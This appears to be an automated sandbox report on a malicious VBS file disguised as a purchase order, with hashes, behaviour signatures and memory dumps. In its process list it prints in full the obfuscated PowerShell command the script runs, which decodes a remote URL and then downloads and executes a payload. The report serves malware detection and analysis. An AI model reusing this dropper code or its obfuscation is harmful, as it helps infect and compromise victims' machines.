Overview

overview

10

Static

static

1

16102024_0...003.gz

windows7-x64

1

16102024_0...003.gz

windows10-2004-x64

10

KULI500796...03.vbs

windows7-x64

8

KULI500796...03.vbs

windows10-2004-x64

10

Resubmissions

16-10-2024 09:33

241016-ljcbsaxejj 10

16-10-2024 07:37

241016-jf9rrszcke 10

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 09:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KULI500796821_PO20000003.vbs

  • Size

    9KB

  • MD5

    56f94f8aed310e90b5f513b1eb999c69

  • SHA1

    95e42e5458cf0117c08de3c6bda83b699fa9be59

  • SHA256

    a81393b534b9f803d64ca3d43f9e3b8a184a9e790ac20f2f51d347114384e7a2

  • SHA512

    d53890af0815934fb10f4eb3e2eae13da5db60d21a9a89f2426de7bbb5ce7ed495a84a371d8c19ce9b707709b3d18f00bc637262a2d3fc7818333b508af4980e

  • SSDEEP

    192:oiJSEy04EcieX8Qui690HKZRBijzH9Iue0LGmeHkQEvbcB1m:ouz4NHaijzH9ZNLwElDY1m

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KULI500796821_PO20000003.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2708-4-0x000007FEF636E000-0x000007FEF636F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2708-5-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2708-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2708-7-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-8-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-10-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-9-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-11-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-12-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-13-0x000007FEF636E000-0x000007FEF636F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2708-14-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-15-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

    Filesize

    9.6MB

    Download